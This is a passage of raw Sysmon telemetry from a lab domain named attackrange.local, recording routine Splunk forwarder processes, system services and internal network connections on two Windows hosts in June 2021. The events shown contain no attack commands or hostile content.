21:47:06.056{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-715A-60CA-270D-00000000D101}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151701Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:06.056{39BD8DE3-715A-60CA-270D-00000000D101}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000105094Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:04.907{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55431-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105093Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:07.533{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C0BB134CD3544CA7D2A3A3A67B6EBF7,SHA256=A5ABF0B8333B2A41EAA0C0BB3E6372717FF1AF13DB410CB8635F432CED2D34B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151720Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.871{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-715B-60CA-280D-00000000D101}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151719Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.871{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151718Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.871{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151717Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.871{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151716Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.871{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151715Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.871{39BD8DE3-0F63-60CA-0500-00000000D101}408424C:\Windows\system32\csrss.exe{39BD8DE3-715B-60CA-280D-00000000D101}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151714Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.871{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-715B-60CA-280D-00000000D101}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151713Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.872{39BD8DE3-715B-60CA-280D-00000000D101}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151712Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.855{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3C160822926015CA530855D73DF1C2A,SHA256=1B661F0662696534C8CCE8756E1C38FCDA0B87227376D4D4374BB6AF6263DC58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151711Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.640{39BD8DE3-480D-60CA-F607-00000000D101}5112NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151710Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:07.072{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C16680C4934A6AC9BC29FC92D433547,SHA256=5FAEFE599BFD06B56AA81F27127EC9760D58F5F8E20DFDA8C37A78685E6B0512,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105095Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:08.898{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1110DE0047AB4A335E8D0C5779CA3A2,SHA256=F25E8580CCDFF8BA1D006F2AE2B4C90DE771B379AB2FAC9983CDB4BA72A5C535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151733Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.857{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81F3923CEE3417E0426920F014F9B5AF,SHA256=DE33528BC55265E5560DEEA8D0157D261A133C4A9A4BD933041ED09F80987E62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151732Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.726{39BD8DE3-715C-60CA-290D-00000000D101}33007032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151731Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.626{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4564C71EB450E6E62727F0B7656A7BB6,SHA256=CD3DC73C3B702A0427299103220707547C02BF1F8EFD432E692ED66686FEC67C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151730Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.541{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-715C-60CA-290D-00000000D101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151729Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.541{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151728Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.541{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151727Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.541{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151726Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.541{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-715C-60CA-290D-00000000D101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151725Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.541{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151724Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.541{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-715C-60CA-290D-00000000D101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151723Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.542{39BD8DE3-715C-60CA-290D-00000000D101}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000151722Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:05.909{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58415-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000151721Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:08.071{39BD8DE3-715B-60CA-280D-00000000D101}59526988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151745Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.874{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=139B5805CED595E5CE4F3BDFB8F7195C,SHA256=208E734BC86090A5259D730D34F54561BB1C22B04602C8A053F846A5E22FF7DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151744Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.727{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6A3841E097877C090B0E09952B03873,SHA256=111472335D6309BA4D2A027B54ECBE2C60AE7AEF84ABC475E9A45555A66266AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151743Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.509{39BD8DE3-715D-60CA-2A0D-00000000D101}7602936C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151742Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.225{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-715D-60CA-2A0D-00000000D101}760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151741Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:09.225{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL3